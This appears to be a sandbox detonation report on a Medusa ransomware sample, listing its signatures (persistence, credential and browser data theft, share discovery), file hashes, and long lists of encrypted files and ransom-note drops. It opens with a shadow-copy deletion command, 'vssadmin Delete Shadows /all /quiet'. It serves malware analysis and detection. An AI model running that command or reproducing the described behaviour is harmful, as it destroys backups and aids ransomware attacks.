vssadmin Delete Shadows /all /quiet

Network

N/A

Files

F:\!!!READ_ME_MEDUSA!!!.txt

MD5 ae2ccfb68aaf040e01ec2280b75c4d49
SHA1 6dd072344d5159e751451ba24624a1e2adbe6e07
SHA256 beff87729e2c44475014eb1efd72bb128b33a9b22309339c2332e3f718e8c4cd
SHA512 69dc9b2ff371a8f49b2d236e81bcaba33df55d5e96f262b16a2de170c88832fbd8696f00e39ef5ee0d8ee85e988abc2b80b3901a773d9161f0d9dc525f5f1618

C:\$Recycle.Bin\S-1-5-21-457978338-2990298471-2379561640-1000\desktop.ini

MD5 a27b010e15755d8499e863c3a4496576
SHA1 79ba7210a0f2ae8027739c0df50fe113b6534e41
SHA256 dd12c3775c770a0b678274a55819cbd809f9771c9bc0e66a554927e83a7daafc
SHA512 b2177ead0d57e07f503b581dfa3cc9ca45f95dc2c1687b708a48b2beadc83346c663a5593319a863e8f996eb37f48cb3f9ac2e4453954f15ccbabd5f383a0a31

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-02 11:22

Reported

2024-10-02 11:24

Platform

win10v2004-20240802-en

Max time kernel

94s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe"

Signatures

Medusa Ransomware

ransomware medusaransomware

Renames multiple (8807) files with added filename extension

ransomware

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A

Network Share Discovery

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\ImportRestart.xht C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\ui-strings.js C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Crashpad\attachments\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-150_contrast-white.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-16_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-20.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-36_altform-unplated_contrast-high.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxNano.winmd C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsrus.xml C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\comments.win32.bundle C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StopwatchSmallTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupMedTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\de-DE\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msdaremr.dll.mui C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\oledb32r.dll.mui C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\lv\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\CroppedImage.xbf C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarSplashLogo.scale-125.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\import_google_contacts\googleImportNoResults.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-125.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\en-GB.PostalAddress.ot C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_KMS_Client_AE-ul.xrm-ms C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewpoints\Dark\MilitaryRight.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-48_altform-unplated_devicefamily-colorfulunplated.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-focus.svg C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Common Files\System\uk-UA\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART5.BDR C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeTile.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\microsoft.system.package.metadata\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui\oskclearuibase.xml C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Fonts\SkypeAssets-Medium.ttf C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
